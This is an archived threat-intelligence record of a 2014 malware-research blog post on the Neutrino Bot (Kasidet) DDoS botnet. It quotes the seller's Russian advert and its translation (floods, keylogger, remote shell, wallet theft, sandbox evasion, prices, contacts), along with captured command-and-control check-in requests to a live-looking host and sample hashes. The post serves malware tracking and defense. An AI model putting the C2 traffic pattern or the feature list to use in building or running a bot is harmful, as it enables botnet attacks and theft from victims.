{
	"id": "8637a73f-eb73-48c0-841f-12a98bbd242f",
	"created_at": "2026-04-06T00:18:20.477675Z",
	"updated_at": "2026-04-10T13:11:27.94382Z",
	"deleted_at": null,
	"sha1_hash": "4bc8add29271ed937e8e251683905122441fb864",
	"title": "Neutrino Bot (aka MS:Win32/Kasidet)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 96331,
	"plain_text": "Neutrino Bot (aka MS:Win32/Kasidet)\r\nArchived: 2026-04-05 19:59:41 UTC\r\n2014-06-18 - Connect the dots\r\nAdvertised on underground by n3utrino since december 2013 Neutrino Bot is another \"HTTP stress testing tool\" , read\r\nDDos Bot.\r\nPiece of the advert\r\nHere is the text of one Advert :\r\n------------------------------------------\r\nNeutrino Bot\r\n- Основной функционал\r\n* HTTP(S) флуд ( методы GET\\POST )\r\n* AntiDDOS флуд ( Эмуляция js\\куки )\r\n* Slowloris флуд\r\n* Download флуд\r\n* TCP флуд\r\n* UDP флуд\r\nhttp://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html\r\nPage 1 of 8\n\n* Лоадер ( exe, dll, vbs, bat ... + возможность указать параметры для запуска файла)\r\n* Кейлоггер (Multilanguage) (поддержка виртуальных клавиатур (снятие скриншотов в области клика размером\r\n60х60)) ( Возможность слежения за указанным окном )\r\n* Command shell ( удалённое выполнение команд с помощью командного интерпретатора windows)\r\n* Стилинг файлов по маске ( кошельков bitcoin к примеру )\r\n* Запуск браузера с переходом по указанной ссылке ( aka накрутчик просмотров)\r\n* Подмена Hosts\r\n* Стиллинг Win ключей\r\n* Размножение ( USB\\Archive )\r\n* Определение чистоты загрузок ( количество найденных \"соседей\" на компьютере )\r\n* Определение установленного АВ ( на всех ОС Windows кроме серверных )\r\n* Обновление\r\n* Работа через прокладки\r\n- Дополнительные функции\r\n* Антиотладка\r\n* AntiVM\r\n* Детект песочниц\r\n* Детект всех онлайн сервисов автоматического анализа\r\n* BotKiller\r\n* Защита бота ( защита процесса\\файла\\веток реестра )\r\n* Неограниченное количество одновременно выполняемых команд ( Некоторые команды имеют более высокий\r\nприоритет по отношению к другим и их выполнение останавливает другие )\r\n* Неограниченное количество резервных доменов\r\n* Тихая работа даже под ограниченной учётной записью\r\n* Не нагружает CPU\r\n- Функционал админки\r\n* Гибкая система создания заданий\r\n* Подробная статистика по ботам\r\n* Возможность отдавать команды каждому боту или стране отдельно\r\n* Настраиваемое время отстука ботов\r\n* Сортировка ботов в стате по IP\\Онлайну\\Стране\\OS\r\n* Система банов.\r\n- Вес несжатого бинарника ~ 50kb ( ЯП - C )\r\n- Бот протестирован на всей линейке Windows, от XP до 8.1 (x32/64)\r\nЦенники -\r\nПолный комплект ( админка + бот + билд на неограниченное кол-во доменов ) - 200$\r\nРебилд ( также неогр. кол-во доменов ) - 10$\r\nОбновление ( функциональное ) - 20$\r\nБилдер - 550$\r\nОплата - WM \\ BTC \\ Perfect\r\nБинарник лицензирован, слив - остаётесь без поддержки.\r\n-Контакты\r\nПМ или n3utrino@kaddafi.me / n3utrino@xmpp.jp\r\nСправка по командам\\Подробное описание функционала - http://n3utrino.blog.com/\r\nP.S. Бот никакого отношения к одноимённой связке не имеет.\r\n------------------------------------------\r\nGoogle Translated as :\r\n------------------------------------------\r\nNeutrino Bot \r\n- The main functional \r\n* HTTP (S) flood (methods GET \\ POST) \r\n* AntiDDOS flood (Emulation js \\ cookies) \r\n* Slowloris flood \r\n* Download flood \r\nhttp://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html\r\nPage 2 of 8\n\n* TCP flood \r\n* UDP flood \r\n* Loader (exe, dll, vbs, bat ... + can specify parameters for running the file) \r\n* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to\r\nmonitor the specified window) \r\n* Command shell (remote command execution using shell windows) \r\n* Stealing files by mask (eg bitcoin wallets) \r\n* Launch the browser with one of these links (aka Cheaters views) \r\n* Spoofing Hosts \r\n* Stilling Win keys \r\n* Reproduction (USB \\ Archive) \r\n* Purity downloads (number found \"neighbors\" on the computer) \r\n* Identifying the installed AV (on all Windows except Server) \r\n* Update \r\n* Work through the gasket \r\n- Additional Features \r\n* Anti debugging \r\n* AntiVM \r\n* Detect sandboxes \r\n* Detect all online services automatic analysis \r\n* BotKiller \r\n* Bot protection (protection process \\ file \\ registry branches) \r\n* Unlimited number of concurrent commands (Some teams have a higher priority than others, and their execution stops\r\nothers) \r\n* Unlimited number of backup domain \r\n* Quiet operation even under a limited account \r\n* Do not load the CPU \r\n- Functional admin \r\n* Flexible system for creating jobs \r\n* Detailed statistics for bots \r\n* Ability to give commands to each country separately or bot \r\n* Customizable otstuk bots \r\n* Sort bots in Articles IP \\ Live \\ Country \\ OS \r\n* System Bans. \r\n- Weight uncompressed binary file ~ 50kb (PL - C) \r\n- Boat tested on the entire line of Windows, from XP to 8.1 (x32/64) \r\ntags - \r\nFull set (+ bot + admin panel to build an unlimited number of domains) - $ 200 \r\nRebuild (also unlim. Quantity domains) - $ 10 \r\nUpdate (functional) - $ 20 \r\nBuilder - $ 550 \r\nPayment - WM \\ BTC \\ Perfect \r\nBinary licensed, plums - are left without support. \r\n-Contact \r\nPM or n3utrino@kaddafi.me / n3utrino@xmpp.jp \r\nCommand Help \\ Detailed functional - http://n3utrino.blog.com/ \r\nP.S. Boat no relation to the same name does not have a bunch.\r\n------------------------------------------\r\nAs you can see it's advertised in the open :\r\nhttp://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html\r\nPage 3 of 8\n\nN3utrino Blog - Information\r\nN3utrino blog - Price\r\nhttp://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html\r\nPage 4 of 8\n\nN3utrino blog - Screenshots\r\nScreenshots provided by the coder on the blog and in forums :\r\nhttp://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html\r\nPage 5 of 8\n\nNeutrino - Index\r\nNeutrino - Clients\r\nNeutrino - Clients 2\r\nhttp://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html\r\nPage 6 of 8\n\nNeutrino - Stats\r\nhttp://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html\r\nPage 7 of 8\n\nNeutrino - Stats 2\r\nCoder also provided the panel on underground.\r\npiece of the Neutrino  panel code.\r\nI met one of those bot (v2.5 - dab012115fa267d95c1145a1eb41d38d ) as a second stage of an Andromeda pushed in Nuclear\r\nPack (the one featured here)\r\nHere is Neutrino calling back home (cf attached pcap) :\r\nhttp://nav1111sto.mcdir.ru/modopo/tasks.php\r\nPOST /modopo/tasks.php HTTP/1.0\r\nHost: nav1111sto.mcdir.ru\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\r\nContent-type: application/x-www-form-urlencoded\r\nCookie: session=21232f297a57a5a743894a0e4a801fc3\r\nContent-length: 8\r\nping=1\r\nhttp://nav1111sto.mcdir.ru/modopo/tasks.php\r\nPOST /modopo/tasks.php HTTP/1.0\r\nHost: nav1111sto.mcdir.ru\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\r\nContent-type: application/x-www-form-urlencoded\r\nCookie: session=21232f297a57a5a743894a0e4a801fc3\r\nContent-length: 137\r\ngetcmd=1\u0026uid=D2BDB99374A80FB8\u0026os=Windows+XP+PRO+(x32)\u0026av=Not+installed\u0026nat=yes\u0026version=2.5\r\nFiles : Pcap - Panel (as v2.1) - Bot v2.5\r\nHashes :  dab012115fa267d95c1145a1eb41d38d (2.5)\r\nbb42fce5d9cb73561ec4e3c343c10d52  (2.1)\r\ne6ea45deca7e9dd9afeb276ec1d4509c (2.0)\r\nce5c86fb4c44a7655ed6caaf42a688b3 2.6 - Pushed in Infinity - 2014-06-19 \r\nRead more :\r\nBarclays Transaction Notification contains \"Neutrino Downloader\" - 2014-04-10 - Kimberly - StopMalvertising\r\nPost Publication Reading :\r\nA Glance Into the Neutrino Botnet - 2014-06-23 - Umesh Wanve - McAfee\r\nSource: http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html\r\nhttp://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html\r\nPage 8 of 8\n\n http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html  \nN3utrino blog-Screenshots   \nScreenshots provided by the coder on the blog and in forums :\n  Page 5 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html"
	],
	"report_names": [
		"neutrino-bot-aka-kasidet.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434700,
	"ts_updated_at": 1775826687,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4bc8add29271ed937e8e251683905122441fb864.pdf",
		"text": "https://archive.orkl.eu/4bc8add29271ed937e8e251683905122441fb864.txt",
		"img": "https://archive.orkl.eu/4bc8add29271ed937e8e251683905122441fb864.jpg"
	}
}